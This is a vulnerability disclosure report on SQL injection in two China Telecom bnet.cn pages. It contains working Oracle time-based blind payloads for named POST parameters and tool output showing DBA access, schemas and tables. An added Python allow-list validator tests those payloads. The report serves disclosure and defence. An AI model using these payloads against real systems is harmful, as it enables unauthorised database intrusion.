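2014-04-02: Details reported to the vendor; awaiting vendor handling
2014-04-07: Vendor confirmed; details disclosed to the vendor only
2014-04-17: Details disclosed to core white hats and experts in related fields
2014-04-27: Details disclosed to regular white hats
2014-05-07: Details disclosed to intern white hats
2014-05-17: Details disclosed to the public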
Telecom injection

http://cq.bnet.cn/hccDocInfoEx.do?action=list
FILETITLE=88952634&pageIndex=88952634&BIGTYPE=88952634
POST-based injection

http://zj.bnet.cn/lhzxExProdProduct.do?action=showsearchaplist&flag=zjWeb
GROUPCODE=1008&PRODNAME=88952634
POST-based injection

DBA privileges; databases:
Place: POST
Parameter: FILETITLE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: FILETITLE=88952634%' AND 1845=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(108)||CHR(105)||CHR(66),5) AND '%'='&pageIndex=88952634&BIGTYPE=88952634
---
web application technology: JSP
back-end DBMS: Oracle
available databases [1]:
[*] CQSWLH
Tables:
Database: CQSWLH
[22 tables]
+----------------------+
| DESCRIPTIONS_REGIONS |
| MARKET               |
| PERSONAL             |
| SUBCATEGORY          |
| SUBJECTS             |
| TISCH                |
| VARIANTS             |
| ATIVIDADE            |
| CDB_ORDERS           |
| CDV_PASSPORT_SET     |
| CONFIGLIST           |
| COUNTRY_DISEASES     |
| ETUDIANT             |
| JIVESASLAUTHORIZED   |
| MUSHROOM_NBC         |
| NUKE_FAQCATEGORIES   |
| PARTENAIRE           |
| PRIMARYTEST2         |
| QUERYCACHETWO        |
| SB_HOST_ADMIN        |
| TELEFONE             |
| USERN                |
+----------------------+
USERN columns:
Table: USERN
[10 columns]
+-------------------+-------------+
| Column            | Type        |
+-------------------+-------------+
| ACCOUNTNAME       | non-numeric |
| CLASSCATEGORY_ID2 | non-numeric |
| E_ID              | non-numeric |
| IDSTATOCIVILE     | non-numeric |
| LLOGARIA          | non-numeric |
| MENUTYPE          | non-numeric |
| PERSISTENT        | non-numeric |
| PNO               | non-numeric |
| TEMPLATE_CODE     | non-numeric |
| VM_PAYMENT_METHOD | non-numeric |
+-------------------+-------------+
DBA:
Place: POST
Parameter: GROUPCODE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: GROUPCODE=1008' AND 8419=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(98)||CHR(114)||CHR(120),5) AND 'viiU'='viiU&PRODNAME=88952634
---
web application technology: JSP
back-end DBMS: Oracle
current user is DBA: True
Database:
Place: POST
Parameter: GROUPCODE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: GROUPCODE=1008' AND 8419=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(98)||CHR(114)||CHR(120),5) AND 'viiU'='viiU&PRODNAME=88952634
---
web application technology: JSP
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'LHZX'
Whitelist
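The whitelist fix named above, applied to the five POST parameters in this report. This is an added example, not part of the original report or the vendor's code; the per-field rules (digits-only ids, restricted character set for the two search fields) are assumptions, since the report does not state the real field types.

```python
import re
from urllib.parse import parse_qsl

# Assumed allow-list rules per POST parameter (the report does not state the
# real field types): numeric ids are ASCII digits only; free-text search
# fields allow letters, digits, CJK characters, spaces, '-' and '_'.
DIGITS = re.compile(r"[0-9]{1,12}")
TEXT = re.compile(r"[0-9A-Za-z\u4e00-\u9fff _-]{0,64}")
RULES = {
    "FILETITLE": TEXT, "pageIndex": DIGITS, "BIGTYPE": DIGITS,
    "GROUPCODE": DIGITS, "PRODNAME": TEXT,
}

def rejected_params(body):
    """Return the names of POST fields that fail the allow-list.

    Unknown field names are rejected too, so a new parameter cannot reach
    the query layer until a rule has been written for it.
    """
    bad = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        rule = RULES.get(name)
        if rule is None or rule.fullmatch(value) is None:
            bad.append(name)
    return bad

# Request bodies copied from the report: one unmodified request and the two
# bodies carrying the time-based payloads shown in the tool output.
BENIGN = "FILETITLE=88952634&pageIndex=88952634&BIGTYPE=88952634"
INJECTED_1 = ("FILETITLE=88952634%' AND 1845=DBMS_PIPE.RECEIVE_MESSAGE("
              "CHR(86)||CHR(108)||CHR(105)||CHR(66),5) AND '%'='"
              "&pageIndex=88952634&BIGTYPE=88952634")
INJECTED_2 = ("GROUPCODE=1008' AND 8419=DBMS_PIPE.RECEIVE_MESSAGE("
              "CHR(100)||CHR(98)||CHR(114)||CHR(120),5) AND 'viiU'='viiU"
              "&PRODNAME=88952634")

if __name__ == "__main__":
    for body in (BENIGN, INJECTED_1, INJECTED_2):
        print(rejected_params(body) or "accepted")
```

An allow-list on free-text fields such as FILETITLE narrows the input but does not replace bind variables in the query itself.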
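Severity: High
Vulnerability Rank: 11
Confirmation time: 2014-04-07 08:34
CNVD confirmed and reproduced the situation described, and it has been passed to CNCERT to notify China Telecom Group Corporation for handling.
None yet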